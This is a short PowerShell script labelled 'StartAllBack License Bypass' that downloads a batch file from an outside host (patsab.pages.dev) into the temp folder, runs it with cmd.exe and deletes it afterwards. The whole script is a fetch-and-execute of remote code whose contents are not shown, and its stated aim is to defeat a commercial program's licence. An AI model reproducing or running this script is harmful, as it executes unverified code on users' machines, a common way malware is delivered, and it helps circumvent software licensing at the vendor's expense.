# This script is hosted for https://github.com/zfrg/StartAllBack-License-Bypass/blob/main/SABPATCHER.bat
Write-Host "StartAllBack License Bypass" -ForegroundColor Cyan
Write-Host "Downloading activation script..." -ForegroundColor Cyan
$url = "https://patsab.pages.dev/d"
$rand = [Guid]::NewGuid().Guid
$tempFile = Join-Path $env:TEMP "SABPATCHER$rand.bat"
try {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri $url -OutFile $tempFile -UseBasicParsing
Write-Host "Script downloaded. Executing..." -ForegroundColor Green
Start-Process cmd.exe -ArgumentList "/c `"$tempFile`"" -Wait
Remove-Item -Path $tempFile -Force -ErrorAction SilentlyContinue
} catch {
Write-Host "Failed: $_" -ForegroundColor Red
}